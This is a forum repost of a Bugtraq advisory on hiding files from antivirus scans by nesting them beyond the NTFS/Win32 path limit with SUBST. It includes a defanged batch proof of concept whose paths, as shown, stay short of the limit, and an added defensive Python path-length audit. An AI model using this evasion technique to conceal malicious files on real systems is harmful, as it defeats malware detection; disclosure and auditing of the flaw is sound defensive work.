This was posted to bugtraq by Hans Somers on Jan 30th:


Long path exploit on NTFS
The filesystem NTFS seems to be a hiding place for viruses if you use a file path which exceeds 256 characters.

What is the case?
The filepath (drive + folderpath + filename) theoretically can take up to 32000 characters if the filesystem in use is NTFS. However, in the way in which Windows NT (4.0, 2000 and XP) accesses this filesystem, a maximum of 256 characters is in place. If you try to go deeper, you will experience a "Path too long" error. In these operating systems there is a way to substitute a long folderpath, using the "SUBST" command. If you change your current drive to the substituted drive, the pathlength is reset to 3 (Q:\ e.g.) and Windows NT allows you to create an even deeper path.
Normally this would not alarm anyone; however, I discovered that my favorite virusscanner (Norton AntiVirus) was not able to follow the deep path where I created the EICAR test string. So I created a very simple batchfile to demonstrate this exploit. My virusscanner will only find this virus if the SUBST drive is available during the scan.

I have tested this on the following platforms:
Windows NT 4.0 SP4
Windows NT 4.0 SP6a
Windows 2000 Professional SP2
Windows XP Pro
I have determined that the following versions of Norton AntiVirus will not follow the deep path during a complete scan:
Norton AntiVirus 5.0
Norton AntiVirus 7.5.1
Norton Antivirus 8.00.58

I suspect that other virusscanners will encounter the same "bug", so you might try the sample script that I created. Additionally, other tools (quota managers, inventory tools etc.) that gather information from an NTFS partition might reveal the same.

After running the script below, remove the substituted drive (SUBST Q: /D) and run a full scan on your C-partition. I suspect that the Eicar-virus will not be found. Additionally, re-create the substituted drive and re-run the scan. Under normal conditions the Eicar-virus will be found and removed (depending on your settings).

As far as I can see, there is no real remedy against this exploit. I hope this message will pass through the proper channels, so the responsible parties will act on this.

Responses to this posting at my address are welcome.

Hans Somers (

Sample script:
@echo off
echo Start test-script NTFS-limit
echo Create a filepath to the limit of NTFS
md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
rem cd /d also switches the current drive, in case the script is not started from C:
cd /d c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
echo Create the Eicar test-string for PoC. This should be detected normally if you have an active virusscanner.
rem The EICAR string itself is not included in this script; this line only appends an empty line to the file.
echo. >>EICAR.TXT
echo Activate the Eicar test-string
echo Create a subst-drive Q: for this path
rem subst needs the target path as its second argument; the folder created above is used here
subst Q: c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
echo Create an even deeper filepath (thus exceeding the limit of NTFS)
md Q:\1234567890\1234567890\1234567890
echo Change current folder into "the deep"
rem Switching the current drive to Q: is what resets the path length to 3
cd /d Q:\1234567890\1234567890\1234567890
echo Create the Eicar test-string
echo. >>EICAR.TXT
echo Activate the Eicar test-string
echo .
echo End of test-script

===END POST===

I'd like to reiterate that these are not my findings, I'm merely passing the information on to these forums.
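The check a defender wants after reading the post above is the true, SUBST-expanded length of a path, plus a way to enumerate everything a MAX_PATH-bound scanner or inventory tool would skip. The following Python script is an added example written for this page; it is not code from the original post, from Hans Somers, or from any antivirus vendor. It parses the output of `subst` (the "Q:\: => target" line shape is an assumption about that command's output, and the table below is a constructed sample), expands a drive letter back to its real path (handling chained substitutions, which goes beyond the single Q: drive in the post), computes the length that matters, and walks a directory tree using the `\\?\` prefix on Windows so the walk itself is not cut off at 260 characters. The demo tree is built in a temporary directory and holds only a harmless marker file; the length arithmetic runs on any platform.

```python
import ntpath
import os
import sys
import tempfile

MAX_PATH = 260  # classic Win32 limit: drive, separators, name and the terminating NUL
LONG_PREFIX = "\\\\?\\"  # the \\?\ form that bypasses MAX_PATH on Windows

# Constructed sample of what `subst` prints with no arguments. The
# "Q:\: => target" line shape is an assumption about the command's output.
SAMPLE_SUBST_OUTPUT = (
    r"Q:\: => C:\temp\1234567890\1234567890\1234567890"
    r"\1234567890\1234567890\1234567890"
)

# The deepest file the post's script creates, as seen through the Q: drive.
SCRIPT_DEEP_FILE = r"Q:\1234567890\1234567890\1234567890\EICAR.TXT"


def parse_subst_output(text):
    """Turn `subst` output lines into a {DRIVE: real_target} table."""
    table = {}
    for line in text.splitlines():
        if "=>" not in line:
            continue
        drive, target = (part.strip() for part in line.split("=>", 1))
        table[drive[:2].upper()] = target  # "Q:\:" -> "Q:"
    return table


def resolve_subst(path, table, max_hops=26):
    """Expand a leading SUBST drive letter to the path it really maps to.
    Substitutions can chain (R: -> Q: -> C:), so loop with a hop limit."""
    for _ in range(max_hops):
        drive, rest = ntpath.splitdrive(path)
        target = table.get(drive.upper())
        if target is None:
            return path  # a real drive, or a relative path: nothing to expand
        path = ntpath.join(target, rest.lstrip("\\"))
    raise ValueError("SUBST chain too long or cyclic: %r" % path)


def true_length(path, table):
    """Length of the path as the filesystem sees it, counting the NUL."""
    return len(resolve_subst(path, table)) + 1


def exceeds_max_path(path, table):
    """True when the fully expanded path would not fit a MAX_PATH buffer."""
    return true_length(path, table) > MAX_PATH


def _fs(path):
    """Form of a path that the OS accepts even beyond MAX_PATH."""
    path = os.path.abspath(path)
    if sys.platform == "win32" and not path.startswith(LONG_PREFIX):
        return LONG_PREFIX + path
    return path


def find_long_paths(root, limit=MAX_PATH):
    """Walk root and return every entry whose absolute path (plus NUL) does
    not fit in limit: these are the entries a MAX_PATH-bound tool skips."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(_fs(root)):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            visible = full[len(LONG_PREFIX):] if full.startswith(LONG_PREFIX) else full
            if len(visible) + 1 > limit:
                hits.append(visible)
    return hits


def demo_walk(levels=30, segment="1234567890", limit=MAX_PATH):
    """Build a constructed tree of `levels` folders in a temp dir, drop a
    harmless marker file at the bottom, and return what the audit flags."""
    with tempfile.TemporaryDirectory() as base:
        deep = os.path.join(base, *([segment] * levels))
        os.makedirs(_fs(deep))
        with open(_fs(os.path.join(deep, "marker.txt")), "w") as fh:
            fh.write("constructed marker file, not a test virus\n")
        return find_long_paths(base, limit)


if __name__ == "__main__":
    table = parse_subst_output(SAMPLE_SUBST_OUTPUT)
    print("Q: maps to", table["Q:"])
    print("real path:", resolve_subst(SCRIPT_DEEP_FILE, table))
    print("true length:", true_length(SCRIPT_DEEP_FILE, table))
    for hit in demo_walk():
        print(len(hit), hit)
```

Run it as-is to see the expanded form of the script's deepest file and the entries of the constructed 30-level tree that fall beyond 260 characters. On a real host, feed the captured output of `subst` to `parse_subst_output` and point `find_long_paths` at each real volume root rather than at the substituted drive; the important point is that the audit counts the length of the resolved path, not the length as seen from Q:.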